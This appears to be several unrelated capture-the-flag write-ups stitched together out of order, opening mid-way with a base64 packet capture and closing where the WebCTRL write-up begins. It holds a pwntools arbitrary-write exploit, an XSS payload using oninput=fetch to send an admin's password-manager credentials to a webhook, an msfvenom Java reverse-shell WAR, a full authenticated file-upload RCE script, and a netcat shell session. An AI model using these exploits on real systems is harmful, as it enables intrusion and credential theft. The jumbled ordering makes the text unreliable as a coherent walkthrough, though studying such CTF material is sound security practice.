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-----END CERTIFICATE-----```
At this point you can [copy-paste it on your local system](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/In%20ctrl%20%2B%20Percival%20PCAP%20Pandemonium/foo.txt) to decode it in the [original `.pcap` file](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/In%20ctrl%20%2B%20Percival%20PCAP%20Pandemonium/webctrl_out.pcap).
```C:\Users\m3ssap0\CTF\DawgCTF 2020\In ctrl>certutil -decode foo.txt webctrl_out.pcapLunghezza input = 56472Lunghezza output = 41029CertUtil: - Esecuzione comando decode riuscita.```
## Percival PCAP Pandemonium Part 1
* **Category:** web/networking* **Points:** 25
### Challenge
> There is an embedded device and some traffic that was being debugged here.> > What is the IP of the embedded device?> > Submit IP as: DawgCTF{xxx.xx.x.xx}> > Author: drew, Percival
### Solution
Analyzing the traffic you can discover that the IP is: 172.24.0.15.
The flag is the following.
```DawgCTF{172.24.0.15}```
## Percival PCAP Pandemonium Part 2
* **Category:** web/networking* **Points:** 75
### Challenge
> There is an embedded device and some traffic that was being debugged here.> > What frame number restarts the device?> > Enter your response as: DawgCTF{xxx}> > Authors: Percival and drew
### Solution
Analyzing the traffic you can discover that the frame is the #167.
The flag is the following.
```DawgCTF{167}``` |
```python
from pwn import *
def write(anything, anywhere):
p.sendline(str(anywhere + 0)) p.sendline(chr((anything & 0xff) >> 0))
p.sendline(str(anywhere + 1)) p.sendline(chr((anything & 0xff00) >> 8))
p.sendline(str(anywhere + 2)) p.sendline(chr((anything & 0xff0000) >> 16))
p.sendline(str(anywhere + 3)) p.sendline(chr((anything & 0xff000000) >> 24))
p.sendline(str(anywhere + 4)) p.sendline(chr((anything & 0xff00000000) >> 32))
p.sendline(str(anywhere + 5)) p.sendline(chr((anything & 0xff0000000000) >> 40))
p.sendline(str(anywhere + 6)) p.sendline(chr((anything & 0xff000000000000) >> 48))
p.sendline(str(anywhere + 7)) p.sendline(chr((anything & 0xff00000000000000) >> 56))
p = remote('challenges1.hexionteam.com', 3002)
# context.terminal = ["tmux", "splitw", "-h"]# p = gdb.debug('./www', env={'LD_PRELOAD' : './libc'})
printf = 0x601020main = 0x400778ret = 0x40056e
p.sendline('-7')p.sendline('\xff')
p.sendline('0')p.sendline('%')
p.sendline('1')p.sendline('2')
p.sendline('2')p.sendline('9')
p.sendline('3')p.sendline('$')
p.sendline('4')p.sendline('p')
write(ret, 45)write(main, 53)
p.sendline('-7')p.sendline('\x00')
data = p.recvuntil('!')
libc_base = int(data.split()[0], 16) - 0x401733gadget = libc_base + 0x4f2c5
log.info('libc_base: %s' % hex(libc_base))log.info('gadget: %s' % hex(gadget))
p.sendline('-7')p.sendline('\xff')
write(gadget, 45)
p.sendline('-7')p.sendline('\x00')
p.recvuntil('!')
p.sendline('cat flag')
print p.recvline().split()[0]``` |
## **Description**> Our mysterious lady is smuggling a bit of extra information.> https://clearedge.ctf.umbccd.io/
## **Getting Flag**### * From the challenge description, when we look at the `source code` of the lady image we get the flag.
> https://media.defense.gov/2018/Sep/03/2001961221/400/400/0/180903-D-IM742-2028.JPG?flag=DawgCTF{ClearEdge_ElizebethSmith}
#### **Flag:**`DawgCTF{ClearEdge_ElizebethSmith}` |
There is a website under `http://34.76.228.102:2003` allowing to login with any login and password excluding `admin`. The `admin` user has it's password required and logging in as admin would give us the flag. The challenge text says that admin is using password manager so I assumed their credentials will be automatically filled when they enter login site.
The website itself allows to send any url and the admin would check it's security. I've created the webhook using [webhook.site](https://webhook.site) and it turns out that if I post this webhook url to the system after few seconds I get the request from that machine.
Examining login page I've found that there is `?next=` added to it's url. Anything we put into this parameter shows inside of `action` attribute of the login form. This is the classic XSS vulnerability that we can exploit. We can add there almost anything, but not `>` as it is changed into `>` on the site, so we can only operate within the `form` element attributes.
The idea for the payload here is to put the webhook url as `action` attribute and add `oninput` event handler that will send the login and password as it will be filled by password manager. Initial idea for the this attribute was:
```oninput=fetch(this.action + this[0].value + `-` + this[1].value)```
but it turned out that `+` signs are stripped, so I've tried with an array and join method like this:
```oninput=fetch([this.action,this[0].value,`-`,this[1].value].join(``))```
and it worked fine. The final payload I've sent was:
```http://34.76.228.102:2003/login?next=https://webhook.site/[my_webhook_guid]?c= oninput=fetch([this.action,this[0].value,`-`,this[1].value].join(``))```
And after a couple of seconds I got the series of requests on my webhook with the last one containing full credentials of an admin:
```admin-WxBkJjpgzAdPsEXr```
Logging with this credentials it displayed a flag: `hexCTF{pa55w0rd_m4nag3rs_c4n_hav3_vuln3rabilit1es_t00}` |
# DawgCTF 2020 – In ctrl + Percival PCAP Pandemonium
These are multiple challenges connected together.
## In ctrl
* **Category:** misc* **Points:** 200
### Challenge
> WebCtrl is really secure I don't know what you're talking about.> > Note: All links are identical and only one link is needed to solve the challenge.> > percival1.ctf.umbccd.io percival2.ctf.umbccd.io percival3.ctf.umbccd.io percival4.ctf.umbccd.io percival5.ctf.umbccd.io> > Author: drew, Percival
### Solution
The host has an installation of WebCTRL system. It allows building operators to optimize and manage all of their building systems - including HVAC, lighting, fire, elevators, and security - all within a single HVAC controls platform. It's everything they need to keep occupants comfortable, manage energy conservation measures, identify key operational problems, and validate the results.
The installed system allows you to authenticate with `Administrator` user and no password or without username and password with `Anonymous` user.
Once logged you can discover the version of WebCTRL is 6.0.
Googling around, you can discover that the system is vulnerable to an Unrestricted File Upload which could lead to Remote Code Execution; a [public exploit is available](https://www.exploit-db.com/exploits/42544).
The issue is caused due to the improper verification when uploading Add-on (`.addons` or `.war`) files using the `uploadwarfile` servlet. This can be exploited to execute arbitrary code by uploading a malicious web archive file that will run automatically and can be accessed from within the webroot directory.
A malicious `.war` file can be created with the following command.
```m3ssap0@server:~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=1337 -f war > m3ssap0.warPayload size: 1100 bytesFinal size of war file: 1100 bytes```
The original [public exploit](https://www.exploit-db.com/exploits/42544) was not working correctly due to errors with authentication. Considering that it was referred to version 6.5, I patched it to accept two more input parameters:* authentication cookies which you can get after login on the web application;* `wbs` token which you can grab analyzing HTTP traffic to the web application.
The [patched exploit](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/In%20ctrl%20%2B%20Percival%20PCAP%20Pandemonium/exploit.py) is the following.
```pythonimport itertoolsimport mimetoolsimport mimetypesimport cookielibimport binasciiimport urllib2import urllibimport sysimport reimport os
from urllib2 import URLErrorglobal bindata
__author__ = 'lqwrm'
piton = os.path.basename(sys.argv[0])
def bannerche(): print ''' @-------------------------------------------------@ | | | WebCTRL 6.5 Authenticated RCE PoC | | ID: ZSL-2017-5431 | | Copyleft (c) 2017, Zero Science Lab | | | @-------------------------------------------------@ ''' if len(sys.argv) < 3: print '[+] Usage: '+piton+' <IP> <WAR FILE> <COOKIES> <WBS TOKEN>' print '[+] Example: '+piton+' 10.0.0.17 webshell.war\n' sys.exit()
bannerche()
host = sys.argv[1]filename = sys.argv[2]cookies = sys.argv[3]token = sys.argv[4]
with open(filename, 'rb') as f: content = f.read()hexo = binascii.hexlify(content)bindata = binascii.unhexlify(hexo)
cj = cookielib.CookieJar()opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))urllib2.install_opener(opener)
print '[+] Probing target http://'+host
try: checkhost = opener.open('http://'+host+'/index.jsp?operatorlocale=en')except urllib2.HTTPError, errorzio: if errorzio.code == 404: print '[!] Error 001:' print '[-] Check your target!' print sys.exit()except URLError, errorziocvaj: if errorziocvaj.reason: print '[!] Error 002:' print '[-] Check your target!' print sys.exit()
print '[+] Target seems OK.'
print '[+] Sending payload.'
class MultiPartForm(object):
def __init__(self): self.form_fields = [] self.files = [] self.boundary = mimetools.choose_boundary() return
def get_content_type(self): return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value): self.form_fields.append((name, value)) return
def add_file(self, fieldname, filename, fileHandle, mimetype=None): body = fileHandle.read() if mimetype is None: mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' self.files.append((fieldname, filename, mimetype, body)) return
def __str__(self):
parts = [] part_boundary = '--' + self.boundary
parts.extend( [ part_boundary, 'Content-Disposition: form-data; name="%s"' % name, '', value, ] for name, value in self.form_fields )
parts.extend( [ part_boundary, 'Content-Disposition: file; name="%s"; filename="%s"' % \ (field_name, filename), 'Content-Type: %s' % content_type, '', body, ] for field_name, filename, content_type, body in self.files )
flattened = list(itertools.chain(*parts)) flattened.append('--' + self.boundary + '--') flattened.append('') return '\r\n'.join(flattened)
if __name__ == '__main__': try: form = MultiPartForm() form.add_field('wbs', token) form.add_field('file"; filename="'+filename, bindata) request = urllib2.Request('http://'+host+'/_common/servlet/lvl5/uploadwarfile') request.add_header('User-agent', 'SCADA/8.0') body = str(form) request.add_header('Content-type', form.get_content_type()) request.add_header('Cookie', cookies) request.add_header('Content-length', len(body)) request.add_data(body) request.get_data() urllib2.urlopen(request).read()
print '[+] Payload uploaded.' print '[+] Shell available at: http://'+host+'/'+filename[:-4] print except urllib2.HTTPError as e: print e.code print e.read()
sys.exit()```
The exploit can be launched with a command like the following.
```m3ssap0@server:~$ python2 exploit.py percival4.ctf.umbccd.io m3ssap0.war "JSESSIONID=5F744836401DA55CDC1474DAFA1B7E6F; JSESSIONIDSSO=9FB32E3316D9800C4C96890CCBE3FE99" 59
@-------------------------------------------------@ | | | WebCTRL 6.5 Authenticated RCE PoC | | ID: ZSL-2017-5431 | | Copyleft (c) 2017, Zero Science Lab | | | @-------------------------------------------------@
[+] Probing target http://percival4.ctf.umbccd.io[+] Target seems OK.[+] Sending payload.[+] Payload uploaded.[+] Shell available at: http://percival4.ctf.umbccd.io/m3ssap0```
At this point, visiting the `http://percival4.ctf.umbccd.io/m3ssap0` will spawn a shell on your listening server. You can now find the flag.
```m3ssap0@server:~$ nc -lvk 1337Listening on [0.0.0.0] (family 0, port 1337)Connection from ec2-52-202-94-107.compute-1.amazonaws.com 49557 received!Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\WebCTRL6.0>cd ..cd ..
C:\>dirdir Volume in drive C has no label. Volume Serial Number is EECC-6B81
Directory of C:\
2020-04-08 15:03 130 FLAG.TXT2009-07-13 23:20 <DIR> PerfLogs2020-04-10 00:12 <DIR> Program Files2019-11-04 20:28 <DIR> Program Files (x86)2019-07-29 12:34 <DIR> Users2020-04-11 16:24 <DIR> WebCTRL6.02020-04-10 00:23 <DIR> Windows 1 File(s) 130 bytes 6 Dir(s) 20,858,126,336 bytes free
C:\>type FLAG.TXTtype FLAG.TXTDawgCTF{t0mc@t_3xplo1t5}Go to C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\README.txt for another clue.```
The flag is the following
```DawgCTF{t0mc@t_3xplo1t5}```
At this point, two new hidden challenges are unlocked under web/networking category. The `FLAG.TXT` file talks about another file related to new challenges.
You can read it with the following commands.
```C:\WebCTRL6.0>type "C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\README.txt"type "C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\README.txt"The PCAP file in this directory contains some data about what traffic happens in this server. There is an embedded device and some traffic that was being debugged here.What is the IP of the embedded device?What protocol is the embedded device communicating with?What is sent to reset the device?
C:\WebCTRL6.0>cd "C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\"cd "C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\"
C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps>dirdir Volume in drive C has no label. Volume Serial Number is EECC-6B81
Directory of C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps
2020-04-08 15:03 304 README.txt2020-04-08 14:50 41,029 webctrl_out.pcap 2 File(s) 41,333 bytes 0 Dir(s) 20,857,974,784 bytes free
```
To exfiltrate `webctrl_out.pcap` you can convert it into base64 and then print it, in order to copy-paste data without problems due to the presence of binary values.
```C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps>certutil -encode webctrl_out.pcap foo.txtcertutil -encode webctrl_out.pcap foo.txtInput Length = 41029Output Length = 56474CertUtil: -encode command completed successfully.
